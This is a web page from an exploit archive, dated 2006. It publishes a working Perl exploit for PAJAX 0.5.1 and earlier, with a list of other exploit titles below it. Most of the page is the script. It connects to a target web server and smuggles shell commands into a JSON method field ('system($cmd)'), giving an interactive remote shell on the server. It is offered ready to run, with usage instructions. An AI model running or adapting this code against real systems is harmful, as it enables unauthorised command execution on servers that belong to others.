exploits , vulnerabilities , articles , PAJAX <= 0.5.1 Remote Code Execution Exploit

2006-04-13

PAJAX <= 0.5.1 Remote Code Execution Exploit

Rated as : Moderate Risk

#!/usr/bin/perl

use IO::Socket;

print "PAJAX Remote Code Injection - code by: Stoney - exploit found
by: RedTeam\n";

if ($ARGV[0] && $ARGV[1])
{
 $host = $ARGV[0];
 $path = $ARGV[1];
 $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr
=> "$host",
PeerPort => "80") || die "connecterror\n";
 while (1) {
   print '['.$host.']# ';
   $cmd = <STDIN>;
   chop($cmd);
   last if ($cmd eq 'exit');
   $ajaxdata = "{\"id\":
\"bb2238f1186dad8d6370d2bab5f290f71\", \"className\":
\"Calculator\", \"method\":
\"add(1,1);system($cmd);\$obj->add\", \"params\":
[\"1\", \"5\"]}";

   print $sock "POST ".$path." HTTP/1.1\n";
   print $sock "Host: ".$host."\n";
   print $sock "Accept-Charset:
ISO-8859-1,utf-8;q=0.7,*;q=0.7";
   print $sock "Content-Type: text/json\n";
   print $sock
"Content-Length:".length($ajaxdata)."\n\n".$ajaxdata;
   while ($ans = <$sock>)
      {
       print "$ans";
      }
  }
 }
else {
 print "Usage: perl ajax.pl [host] [path_to_ajax]\n\n";
exit;
}
securitydot.net - 2006-04-13

Exploits - newest 10 RSS | More

2007-06-15 38444 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20065 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23886 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20046 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12345 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10503 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12716 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22722 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11063 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit